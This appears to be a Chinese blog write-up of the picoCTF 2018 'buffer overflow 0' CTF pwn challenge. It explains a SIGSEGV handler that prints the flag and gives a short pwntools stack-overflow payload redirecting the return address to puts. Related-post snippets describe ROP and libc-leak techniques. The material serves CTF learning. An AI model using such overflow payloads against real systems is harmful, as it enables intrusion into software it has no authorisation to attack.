BUUCTF--pwn picoctf_2018_buffer overflow 0

最新推荐文章于 2022-06-17 12:35:51 发布
最新推荐文章于 2022-06-17 12:35:51 发布
阅读量442 收藏 1
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/116279483
版权
本文探讨了SIGSEGV信号在程序中的作用,当发生无效内存访问时,它触发一个信号处理函数,将flag的值输出到stderr。文章还介绍了两种解题策略,一种是直接利用对内存的非法访问触发信号,另一种是通过覆盖返回地址调用puts函数来显示flag的值。内容涉及内存安全、信号处理和缓冲区溢出漏洞利用。
摘要由CSDN通过智能技术生成

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述来查看信号函数代表的含义:

11是 SIGSEGV,表示对存储的无效访问
点进去sigsegv_handler
在这里插入图片描述同时将flag的值赋予了stderr

现在知道那个信号函数的作用是:

当发生 对存储的无效访问时,会把stderr打印输出,即将flag的值打印输出

再往下有个 vuln函数
在这里插入图片描述

有两种解题方式

方法一:

经过前面的分析,我们知道了当发生了对 内存存储无效的访问会将flag打印出来

在这里插入图片描述
首先ssh链接,输入密码后

在这里插入图片描述
方法二:将ret覆盖成put,然后输出flag地址上的值,

from pwn import *
elf = ELF("./PicoCTF_2018_buffer_overflow_0")
payload = 'a' * (0x18 + 4) + p32(elf.plt['puts']) + p32(0) + p32(0x0804A080)
print("payload : " + payload)

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
得到了一串值 aaaaaaaaaaaaaaaaaaaaaaaaaaaa��\x04\x00\x00\x80\xa0\x04
在这里插入图片描述

半岛铁盒@
关注
专栏目录
BUUCTF:[Black Watch 入群题]PWN(write up)
qq_44768749的博客
08-23 948
BUUCTF:[Black Watch 入群题]PWN0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp0x06 栈迁移补充32位程序 0x01 文件分析 开启了栈不可执行 0x02 运行 运行一下没什么特殊的,猜测应该是栈溢出 0x03 IDA 虽然buf在栈上但输入的长度仅仅能够覆盖ebp和返回地址,但s在bss段,而且输入的长度也够长,因此想到了栈迁移,覆盖vul_function返回地址,使其到bss段上执行 0x04 思路 s在bss段上的地址为0
BUUCTF-pwn2_sctf_2016
weixin_44145820的博客
03-06 1022
这题利用的是负数转无符号数造成缓冲区溢出,以及泄露libc基地址执行ROP 题目分析 由于NX开启,我们考虑使用ROP,Canary没有打开使得这题变得很方便 下面是vuln函数: 在该函数中,程序读入一个字符串并转化为带符号整形(signed int),这时,如果我们输入负数可以避开不能大于32的检查 在get_n函数中,读入长度被强制转换为unsigned int,此时-1变成了42949...
[BUUCTF]PWN——picoctf_2018_buffer overflow 0
mcmuyanga的博客
03-09 475
picoctf_2018_buffer overflow 0 附件 步骤 例行检查,32位程序,开启了nx保护 提示要ssh链接 ssh连上后稍微尝试了一下,好像vuln这个程序能读出flag 32为ida载入测试文件 百度一下signal,得知11是(SIGSEGV),对存储的无效访问的信号。 15行的意思是设置了一个函数sigsegv_handler来处理当程序产生对存储的无效访问。 就是说当程序造成无效内存访问的时候,就会输出flag。 在往下看vuln函数 将src拷贝到dest中,
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0
Y_peak的博客
04-28 428
[BUUCTF-pwn]——picoctf_2018_buffer overflow 0 好久不写BUU了,手都快生了赶快过来写写。 通过观察源文件发现,首先有put函数不需要去libc中找,同时argv肯定大于1,也就是需要至少两个参数,才可以到else语句,同时vuln函数的参数是第二个参数。 进入vuln函数内部看看,找到strcpy函数这个函数是一个典型的可以用来利用溢出的函数。所以我们可以在这里进行栈溢出,以此调用puts函数打印flag.因为flag在bss段上。 from pwn imp
picoctf_2018_buffer overflow 0
z1r0的博客
02-14 429
picoctf_2018_buffer overflow 0 查看保护 这里会将flag输入到flag这个全局变量里,还有一个signal信号11。表示对存储的无效访问 这里的话将flag写到stderr中。然后fflush(stdeer)刷新标准错误输出缓冲区,把输出缓冲区里的东西打印到标准输出设备上 ,也就是会打印flag。其实就是当程序造成无效内存访问的时候,就会输出flag。 接着再输入参数,放到vuln函数里 这里有一个栈溢出,因为输入的参数可以无限长,所以在执行栈溢出时,程序会造成无效内
BUUCTF-PWN rctf_2019_babyheap(house of storm,堆SROP)
weixin_44145820的博客
06-05 1575
目录题目分析漏洞利用Exp 题目分析 程序还有沙箱保护,把execve禁用了,只能orw了 漏洞利用 Exp
BUUCTF-Pwn-get_started_3dsctf_2016
餐桌上的猫
03-04 210
题目截图
CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换
serfend's blog
04-14 516
CTF-PWN 来源:https://buuoj.cn/challenges 内容: 附件:https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码:mpgo 答案:flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路 发现get_flag的位置 发现输入会被替换,构造exp 详细步骤 查看文件信息 查看题目发现是将用户输入的I替换为you,虽然输入的时候只允许输入32位,但是因为替换
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTFPicoCTF_2018_buffer_overflow_1
weixin_51055545的博客
01-05 1385
先放进虚拟机中检查: 任何保护机制都没开,放到32位IDA中: 主函数很简单,进入vuln()函数看一下: 很明显有溢出,进入栈中看偏移: 这里偏移为0x28,我们思路是第一次溢出,去泄露libc地址,再次进行溢出get shell。 第一次溢出: io.recvuntil(':') payload = 'A'*0X28 payload += p32(0) payload += p32(printf) payload += p32(main) payload += p32(elf.got.
picoctf_2018_buffer overflow_1&&pwnable_start&&hitcontraining_magicheap
、moddemod
07-19 350
picoctf_2018_buffer overflow_1 exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './PicoCTF_2018_buffer_overflow_1' # p = process(proc_name) p = remote('node3.buuoj.cn', 28190) e
buuctf-pwn write-ups (1)
CoLin的pwn小屋
05-01 452
buuctf-pwn 001-016题wp
[BUUCTF]PWN——picoctf_2018_buffer overflow 1/2
mcmuyanga的博客
11-07 492
picoctf_2018_buffer overflow 1 附件 步骤: 例行检查,32位程序,没开保护 本地运行一下程序,看看程序大概的执行情况 32位ida载入,习惯性的检查程序里的字符串,发现有flag.txt,跟进,找到了读出flag的函数,win_addr=0x80485CB 根据运行时看到的字符串找到了输入点 gets函数读入,存在溢出漏洞,覆盖ret为win函数即可 from pwn import * r=remote('node3.buuoj.cn',27200) win_a
buuctf-pwn write-ups (4)
CoLin的pwn小屋
06-12 532
buuctf 032-038题题解,重点关注038题 pwnable_orw
buuctf-pwn write-ups (2)
CoLin的pwn小屋
05-07 301
buuctf-pwn 017-026题wp,重点关注babyheap
BUUCTF-PWN-Writeup-1-5
feng的博客
01-20 3245
前言 开始刷一刷BuuctfPWN题,一遍学一遍刷题了。 其实主要是堆学的顶不住了。。。一个下午才搞懂一个知识点,太tm的难了。 test_your_nc from pwn import * from LibcSearcher import * context(log_level="debug",os="linux") p = remote('node4.buuoj.cn',27517) p.interactive() rip 坑。。。。 一个gets的栈溢出,后门函数fun()在0x401186,本
buuctf-pwn write-ups (3)
CoLin的pwn小屋
05-15 288
buuctf pwn 027-031题
buuctf-pwn write-ups (5)
CoLin的pwn小屋
06-17 259
buuctf-pwn 039~046题
buuctf [HarekazeCTF2019]baby_rop2
最新发布
09-30
[BUUCTF-pwn]——[HarekazeCTF2019]baby_rop2是一个pwn题目。在这个题目中,主要的目标是获取read函数的地址,并利用该地址泄漏libc基址,然后计算system函数和/bin/sh字符串的地址,最终执行system('/bin/sh')获取shell权限。解题的过程中,通过找到rsi寄存器的地址,将其设置为read函数的地址,然后再通过调用printf函数,将read函数的地址泄漏出来,从而计算libc基址。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值